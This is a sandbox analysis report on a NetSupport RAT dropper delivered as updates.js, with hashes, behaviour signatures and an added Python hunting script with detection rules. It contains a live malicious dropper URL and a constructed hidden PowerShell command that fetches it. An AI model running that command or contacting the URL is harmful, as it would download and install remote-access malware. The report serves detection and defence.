General

  • Target

    updates.js

  • Size

    7.3MB

  • Sample

    240606-ds76tagc99

  • MD5

    cbb64c3f4095d8fc567c2e3fc1295a67

  • SHA1

    a114622094d9563593cd3e571ffb2d7f67edd8c9

  • SHA256

    db302ab8343193ac2826bd9de5b168af740c6e6e6779149daec44efc0ac01b95

  • SHA512

    eda9bf2299253b5026a38f43bb5e5eaf1169332e9a3afb699928c059713952f2604c442476f31e5f98a8f67073948e0e0697591ade88c2999ff0b0c3d0e35fd9

  • SSDEEP

    49152:e7h4zjCxb7qHlp4XONN0G7h20kQmwYzYMm7u+8wgJ3wr/xN1GIWx3qpWROg2cE08:7

Malware Config

Extracted

  • Language

    ps1

  • Source URLs

    ps1.dropper    http://lilygovert91.top/data.php?10425
    exe.dropper    http://lilygovert91.top/data.php?10425

    Both the PowerShell and the EXE dropper stages fetch the same URL.

Targets

    • NetSupport

      NetSupport is a remote access tool sold as legitimate system-administration software; here it is the final payload.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application
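The signatures above describe a short chain: a script host runs the .js, which launches a hidden PowerShell that fetches the dropper URL, checks the configured country, executes a dropped EXE and sets a Run key. The following is an added hunting example, not part of the sandbox report: it takes the hashes and dropper URL listed above as indicators and runs simple rules for each listed behaviour over a handful of constructed Sysmon-style events. The event layout, the user-writable path list and the registry path used for the geofence lookup (`Control Panel\International\Geo`) are assumptions.

```python
"""Hunt the indicators and behaviours from the report above across a
handful of constructed Sysmon-style events. Added example: the event
format and the registry path used for the geofence check are assumptions."""
import re
from urllib.parse import urlparse

# Indicators copied from the report.
IOC_HASHES = {
    "md5": "cbb64c3f4095d8fc567c2e3fc1295a67",
    "sha1": "a114622094d9563593cd3e571ffb2d7f67edd8c9",
    "sha256": "db302ab8343193ac2826bd9de5b168af740c6e6e6779149daec44efc0ac01b95",
}
IOC_URLS = {"http://lilygovert91.top/data.php?10425"}
IOC_DOMAINS = {urlparse(u).hostname for u in IOC_URLS}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")  # assumed
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
# Assumed location of the per-user country code consulted by the geofence.
GEO_KEY = re.compile(r"\\Control Panel\\International\\Geo\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the (rule, detail) pairs that one event matches."""
    hits = []
    kind = ev["type"]
    if kind == "file":
        for alg, val in IOC_HASHES.items():
            if ev.get("hashes", {}).get(alg, "").lower() == val:
                hits.append(("known_sample_hash", f"{alg}:{val} {ev['path']}"))
    elif kind == "process":
        image, parent = basename(ev["image"]), basename(ev["parent"])
        cmd = ev.get("cmdline", "")
        if image in POWERSHELL and HIDDEN_WINDOW.search(cmd):
            hits.append(("powershell_hidden_window", cmd))
        if parent in {"wscript.exe", "cscript.exe"} and image in POWERSHELL:
            hits.append(("script_host_spawns_powershell", f"{parent} -> {image}"))
        # "Executes dropped EXE": a script host starts a binary from a user-writable path.
        if parent in SCRIPT_HOSTS and any(d in ev["image"].lower() for d in USER_WRITABLE):
            hits.append(("dropped_exe_executed", ev["image"]))
    elif kind == "network":
        host = ev.get("host", "").lower()
        if ev.get("url") in IOC_URLS or host in IOC_DOMAINS:
            hits.append(("dropper_url_contact", ev.get("url") or host))
        if basename(ev["image"]) in SCRIPT_HOSTS:
            hits.append(("blocklisted_process_network_request", f"{basename(ev['image'])} -> {host}"))
    elif kind == "registry":
        key, op = ev["key"], ev["op"]
        if op == "SetValue" and RUN_KEY.search(key):
            hits.append(("run_key_persistence", f"{key} = {ev.get('data', '')}"))
        if op == "QueryValue" and GEO_KEY.search(key):
            hits.append(("geofence_country_lookup", key))
    return hits


def hunt(events):
    """Run every event through check_event and return flat findings."""
    return [{"ts": ev["ts"], "rule": rule, "detail": detail}
            for ev in events for rule, detail in check_event(ev)]


# Constructed telemetry mirroring the report's signature list; not real logs.
SAMPLE_EVENTS = [
    {"ts": 1, "type": "file", "path": r"C:\Users\victim\Downloads\updates.js",
     "hashes": {"sha256": "db302ab8343193ac2826bd9de5b168af740c6e6e6779149daec44efc0ac01b95"}},
    {"ts": 2, "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\updates.js"'},
    {"ts": 3, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://lilygovert91.top/data.php?10425"'},
    {"ts": 4, "type": "network", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "host": "lilygovert91.top", "url": "http://lilygovert91.top/data.php?10425"},
    {"ts": 5, "type": "registry", "op": "QueryValue",
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    {"ts": 6, "type": "process", "image": r"C:\Users\victim\AppData\Roaming\updates\client32.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "client32.exe"},
    {"ts": 7, "type": "registry", "op": "SetValue",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NetSupport",
     "data": r"C:\Users\victim\AppData\Roaming\updates\client32.exe"},
    {"ts": 8, "type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "host": "example.com", "url": "https://example.com/"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['ts']}] {f['rule']}: {f['detail']}")
```

The rules are deliberately narrow: hash and URL matches are exact, the hidden-window and Run-key checks are regexes over the command line and key path, and the benign browser event at the end produces no finding. In a real deployment the geofence rule in particular should be baselined first, since legitimate software also reads the locale keys.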

MITRE ATT&CK Enterprise v15
